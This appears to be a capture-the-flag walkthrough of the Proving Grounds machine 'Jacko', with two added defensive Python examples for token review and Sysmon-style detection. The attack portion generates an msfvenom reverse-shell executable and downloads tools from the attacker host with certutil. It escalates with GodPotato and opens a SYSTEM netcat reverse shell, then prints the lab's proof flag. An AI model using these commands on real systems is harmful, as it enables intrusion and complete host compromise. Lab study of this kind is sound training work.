Proving Grounds Practice-Jacko

She ran off from the beach, leaving behind some regrets; being alone isn't all that bitter.

I imitate the extraordinary, yet at the same time I long for company.


Target IP: 192.168.55.66

Difficulty: Hard

Topics covered: privilege escalation via SQL statements, code execution from the database, GodPotato privilege escalation


Port scan

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p- 192.168.55.66
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-20 06:36 +0000
Stats: 0:01:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 14.90% done; ETC: 06:47 (0:09:31 remaining)
Stats: 0:02:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.43% done; ETC: 06:47 (0:08:39 remaining)
Stats: 0:02:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.43% done; ETC: 06:47 (0:08:39 remaining)
Stats: 0:02:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.44% done; ETC: 06:47 (0:08:38 remaining)
Stats: 0:02:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.44% done; ETC: 06:47 (0:08:38 remaining)
Stats: 0:03:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 33.54% done; ETC: 06:47 (0:07:24 remaining)
Stats: 0:05:34 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 51.27% done; ETC: 06:46 (0:05:17 remaining)
Stats: 0:07:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.67% done; ETC: 06:46 (0:03:19 remaining)
Stats: 0:09:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 82.20% done; ETC: 06:46 (0:01:57 remaining)
Stats: 0:10:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.16% done; ETC: 06:47 (0:00:19 remaining)
Nmap scan report for 192.168.55.66
Host is up (0.00073s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
8082/tcp open blackice-alerts
9092/tcp open XmlIpcRegSvc
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 663.33 seconds

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p80,135,139,445,5040,8082,9092,49664,49665,49666,49667,49668,49669 192.168.55.66 -sC -sV -T4 -A
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-20 06:48 +0000
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 92.31% done; ETC: 06:50 (0:00:08 remaining)
Nmap scan report for 192.168.55.66
Host is up (0.00074s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
8082/tcp open http H2 database http console
|_http-title: H2 Console
9092/tcp open XmlIpcRegSvc?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :



Curl port 80

┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl 192.168.55.66
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--
Copyright 2004-2019 H2 Group. Multiple-Licensed under the MPL 2.0,
and the EPL 1.0 (http://h2database.com/html/license.html).
Initial Developer: H2 Group
-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="description" content="H2 is free SQL database written in Java"/>
<title>
H2 Database Engine (redirect)
</title><link rel="stylesheet" type="text/css" href="html/stylesheet.css" />
<script type="text/javascript">
location.href = 'html/main.html';
</script>
</head>
<body style="margin: 20px;">

<h1>H2 Database Engine</h1>
<p>
Welcome to H2, the free SQL database. The main feature of H2 are:
</p>
<ul>
<li>It is free to use for everybody, source code is included
</li><li>Written in Java, but also available as native executable
</li><li>JDBC and (partial) ODBC API
</li><li>Embedded and client/server modes
</li><li>Clustering is supported
</li><li>A web client is included
</li></ul>

<h2>No Javascript</h2>
<p>
If you are not automatically redirected to the main page, then
Javascript is currently disabled or your browser does not support Javascript.
Some features (for example the integrated search) require Javascript.
Please enable Javascript, or go ahead without it:
</p><p>
<a href="html/main.html" style="font-size: 16px; font-weight: bold">H2 Database Engine</a>
</p>

</body></html>

Port 8082 is the database's web management console; the default account sa with an empty password logs straight in.

H2 Database 1.4.199 - JNI Code Execution - Java local Exploit

Just follow the exploit's steps.

Generate the payload with msfvenom

┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.55 LPORT=4444 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: reverse.exe

certutil -split -urlcache -f http://192.168.49.55/reverse.exe C:\\Users\\tony\\rev.exe

┌──(root㉿kali)-[/home/kali/Desktop]
└─# wget -q https://raw.githubusercontent.com/brightio/penelope/refs/heads/main/penelope.py && python3 penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 -> 127.0.0.1 • 192.168.49.55
  • Main Menu (m) • Payloads (p) • Clear (Ctrl-L) • Quit (q/Ctrl-C)
[+] [New Reverse Shell] => 192.168.55.66 WINDOWS • operable program or batch file. • Session ID <1>
[+] Added readline support...
[+] Interacting with session [1] • Readline • Menu key Ctrl-D
[+] Session log: /home/kali/.penelope/sessions/192.168.55.66-WINDOWS/2026_04_20-07_21_11-108.log
──────────────────────────────────────────────────────────────────────────────────────────────────────
C:\Program Files (x86)\H2\service>

C:\Program Files (x86)\H2\service>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

Oddly, though, whoami cannot be executed.

Probably related to the environment variables (PATH) of the current process.

C:\Program Files (x86)\H2\service>cd c:\windows\system32
cd c:\windows\system32

c:\Windows\System32>

c:\Windows\System32>whoami
whoami
jacko\tony


c:\Windows\System32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
========== ==============================================
jacko\tony S-1-5-21-3761179474-3535027177-3462755717-1001


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

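The token above tells the whole privilege-escalation story before any tool runs: the account is a plain user, but it is a member of NT AUTHORITY\SERVICE and holds SeImpersonatePrivilege, which is what every Potato-family tool relies on. The following is an added example, not code from the write-up: it parses `whoami /all` output into user, groups, integrity label and privileges, and reports when a service-context token carries an impersonation privilege. The sample text is a constructed, shortened copy of the output above.

```python
import re

# Constructed sample: a shortened copy of the "whoami /all" output in the write-up.
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------

User Name SID
========== ==============================================
jacko\tony S-1-5-21-3761179474-3535027177-3462755717-1001


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

USER_RE = re.compile(r"^(\S+\\\S+)\s+(S-1-5-21-[\d-]+)$")
GROUP_RE = re.compile(r"^(.+?)\s+(Well-known group|Alias|Group|Label)\s+(S-1-[\d-]+)")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")

# Privileges that let a process take another account's token. Potato-family
# tools need one of them, so their mere presence (Enabled or not) is the finding.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_whoami_all(text: str) -> dict:
    """Split 'whoami /all' output into user, groups, integrity label and privileges."""
    info = {"user": None, "sid": None, "groups": {}, "privileges": {}, "integrity": None}
    for line in text.splitlines():
        line = line.strip()
        if (m := USER_RE.match(line)):
            info["user"], info["sid"] = m.groups()
        elif (m := PRIV_RE.match(line)):
            info["privileges"][m.group(1)] = m.group(3)
        elif (m := GROUP_RE.match(line)):
            name, kind, sid = m.groups()
            if kind == "Label":          # the integrity level is listed as a group
                info["integrity"] = name
            else:
                info["groups"][name] = sid
    return info


def assess_token_risk(info: dict) -> list:
    """Explain why this token is a SYSTEM-escalation risk if code runs under it."""
    findings = []
    held = TOKEN_PRIVS & set(info["privileges"])
    if held:
        findings.append(f"{info['user']} holds {', '.join(sorted(held))}: any code "
                        "execution in this process can reach SYSTEM via token impersonation")
    if "NT AUTHORITY\\SERVICE" in info["groups"]:
        findings.append("token carries NT AUTHORITY\\SERVICE, so this is a service "
                        "account: SeImpersonatePrivilege comes with that group by default; "
                        "isolating or patching the service matters more than the account "
                        "not being an administrator")
    return findings


if __name__ == "__main__":
    for finding in assess_token_risk(parse_whoami_all(SAMPLE_WHOAMI)):
        print("-", finding)
```

Run it against a saved `whoami /all` from any service account during a review; the GROUP_RE pattern is lazy on the name so multi-word names such as `NT AUTHORITY\Authenticated Users` parse correctly.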


SeImpersonatePrivilege is enabled? Then just go straight for GodPotato.

c:\Windows\System32>certutil -split -urlcache -f http://192.168.49.55/GodPotato-NET4.exe C:\\Users\\tony\\GodPotato-NET4.exe
certutil -split -urlcache -f http://192.168.49.55/GodPotato-NET4.exe C:\\Users\\tony\\GodPotato-NET\GodPotato-NET4.exe
**** Online ****
0000 ...
e000


CertUtil: -URLCache command completed successfully.


C:\Users\tony>GodPotato-NET4.exe -cmd "cmd /c whoami"
GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140735462309888
[*] DispatchTable: 0x140735464652384
[*] UseProtseqFunction: 0x140735464019984
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\dfb4968b-871e-4770-a8d0-a2e05574f334\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000cc02-0d6c-ffff-45de-e5ac31e70806
[*] DCOM obj OXID: 0x322b4bc94cefbad3
[*] DCOM obj OID: 0x3da460c334b8ad1c
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 800 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1460

c:\Windows\System32>certutil -split -urlcache -f http://192.168.49.55/nc.exe C:\\Users\\tony\\nc.exe
certutil -split -urlcache -f http://192.168.49.55/nc.exe C:\\Users\\tony\\nc.exe
**** Online ****
0000 ...
e800
CertUtil: -URLCache command completed successfully.
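Each step of this chain leaves telemetry a defender can key on: both `certutil -urlcache -f http://...` downloads, GodPotato's fake endpoint-mapper pipe (`\\.\pipe\<GUID>\pipe\epmapper`, visible in its output above, as opposed to the real `\\.\pipe\epmapper`), and a SYSTEM-level process started from a user profile. The following is an added example, not code from the write-up: it runs those three checks over constructed sample events whose field names are modelled on Sysmon's process-creation (event 1) and pipe-created (event 17) records; the event shapes and the rule names are assumptions of this example.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry modelled on Sysmon fields for the steps in this
# write-up: event 1 = process creation, event 17 = named pipe created.
SAMPLE_EVENTS = [
    {"event": 1, "image": r"C:\Windows\System32\certutil.exe", "user": r"jacko\tony",
     "cmdline": r"certutil -split -urlcache -f http://192.168.49.55/nc.exe C:\Users\tony\nc.exe"},
    {"event": 1, "image": r"C:\Windows\System32\certutil.exe", "user": r"jacko\tony",
     "cmdline": r"certutil -verify C:\certs\server.cer"},               # benign use
    {"event": 17, "image": r"C:\Users\tony\GodPotato-NET4.exe", "user": r"jacko\tony",
     "pipe": r"\\.\pipe\5080d89a-5c40-4db8-beff-473c23064c80\pipe\epmapper"},
    {"event": 17, "image": r"C:\Windows\System32\svchost.exe", "user": r"NT AUTHORITY\NETWORK SERVICE",
     "pipe": r"\\.\pipe\epmapper"},                                      # the real endpoint mapper
    {"event": 1, "image": r"C:\Users\tony\nc.exe", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": r"C:\Users\tony\nc.exe 192.168.49.55 5555 -e cmd.exe"},
]

GUID = r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}"
# GodPotato-style pipe: a GUID inserted before "\pipe\epmapper"
FAKE_EPMAPPER_RE = re.compile(r"^\\\\\.\\pipe\\" + GUID + r"\\pipe\\epmapper$", re.I)


def is_certutil_download(image: str, cmdline: str) -> bool:
    """certutil used as a downloader: a urlcache switch plus a URL argument."""
    if PureWindowsPath(image).name.lower() != "certutil.exe":
        return False
    tokens = [t.lower() for t in cmdline.split()]
    has_urlcache = any(t.lstrip("-/") == "urlcache" for t in tokens)
    has_url = any(t.startswith(("http://", "https://")) for t in tokens)
    return has_urlcache and has_url


def is_fake_epmapper_pipe(pipe: str) -> bool:
    """True for the GUID-prefixed epmapper pipe, never for the genuine one."""
    return FAKE_EPMAPPER_RE.match(pipe) is not None


def is_netcat_shell(cmdline: str) -> bool:
    """netcat launched with -e, i.e. a shell bound to a socket."""
    tokens = [t.lower() for t in cmdline.split()]
    has_nc = any(PureWindowsPath(t).name in ("nc.exe", "nc64.exe", "ncat.exe") for t in tokens)
    return has_nc and "-e" in tokens


def triage(events: list) -> list:
    """Return (event index, rule name) for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        if ev["event"] == 1 and is_certutil_download(ev["image"], ev["cmdline"]):
            hits.append((i, "certutil-download"))
        if ev["event"] == 1 and is_netcat_shell(ev["cmdline"]):
            hits.append((i, "netcat-reverse-shell"))
        if ev["event"] == 17 and is_fake_epmapper_pipe(ev["pipe"]):
            hits.append((i, "fake-epmapper-pipe"))
        # SYSTEM running a binary out of a user profile is the post-escalation tell
        if (ev.get("user", "").upper() == "NT AUTHORITY\\SYSTEM"
                and ev["image"].lower().startswith("c:\\users\\")):
            hits.append((i, "system-process-from-user-profile"))
    return hits


if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx].get('cmdline') or SAMPLE_EVENTS[idx].get('pipe')}")
```

The pipe rule is the most specific of the three: the legitimate endpoint mapper is always `\\.\pipe\epmapper`, so any extra path component in front of `\pipe\epmapper` is worth an alert on its own, independent of which Potato variant created it.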

┌──(root㉿kali)-[/usr/share/windows-resources/binaries]
└─# ls
enumplus fgdump klogger.exe nbtenum plink.exe vncviewer.exe whoami.exe
exe2bat.exe fport mbenum nc.exe radmin.exe wget.exe

┌──(root㉿kali)-[/usr/share/windows-resources/binaries]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.55.66 - - [20/Apr/2026 07:48:49] "GET /nc.exe HTTP/1.1" 200 -
192.168.55.66 - - [20/Apr/2026 07:48:49] "GET /nc.exe HTTP/1.1" 200 -
192.168.55.66 - - [20/Apr/2026 07:49:15] "GET /nc.exe HTTP/1.1" 200 -
192.168.55.66 - - [20/Apr/2026 07:49:15] "GET /nc.exe HTTP/1.1" 200 -

C:\Users\tony>GodPotato-NET4.exe -cmd "cmd /c C:\Users\tony\nc.exe 192.168.49.55 5555 -e cmd.exe"
GodPotato-NET4.exe -cmd "cmd /c C:\Users\tony\nc.exe 192.168.49.55 5555 -e cmd.exe"
[*] CombaseModule: 0x140735462309888
[*] DispatchTable: 0x140735464652384
[*] UseProtseqFunction: 0x140735464019984
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\5080d89a-5c40-4db8-beff-473c23064c80\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00005402-0fd4-ffff-cca4-053d263dd56d
[*] DCOM obj OXID: 0x1298a5c42aef4993
[*] DCOM obj OID: 0x8c5bfaa20f7f4d13
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 800 Token:0x772 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3536

C:\Windows\system32>whoami
whoami

C:\Windows\system32>type c:\users\administrator\desktop\proof.txt
type c:\users\administrator\desktop\proof.txt
d8ddf60b6ae45ed458bb87e6fcf37ba3



http://example.com/2026/04/20/Proving-Grounds-Practice-Jacko/
Author
Skyarrow
Posted on
April 20, 2026